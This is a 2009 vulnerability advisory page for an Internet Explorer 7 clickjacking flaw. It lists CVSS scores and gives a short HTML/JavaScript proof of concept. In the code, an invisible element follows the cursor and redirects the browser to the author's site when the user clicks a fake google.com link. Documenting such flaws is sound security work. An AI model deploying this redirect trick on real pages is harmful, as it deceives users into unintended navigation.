Internet Explorer 7 ClickJacking Vulnerability (2009-01-23)

2009.02.04
Credit: UzmiX
Risk: Low
Local: Yes
Remote: No


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

############################################################# # Application Name : İnternet Explorer 7 # Vulnerable Type : Clickjacking # Author : UzmiX ############################################################# < ------------------- header data end of ------------------- > <html> <body> <div id="open" onmouseover="document.location='http://www.uzmix.net';" style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('open').style.left=mouseX-2; document.getElementById('open').style.top=mouseY-2; } </script> <center> <br> <br> <a href="http://www.google.com" onclick="updatebox(event)"><font style="font-family:arial;font-size:32px">http://www.google.com</font></a> </html>

References:

http://www.milw0rm.com/exploits/7912


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top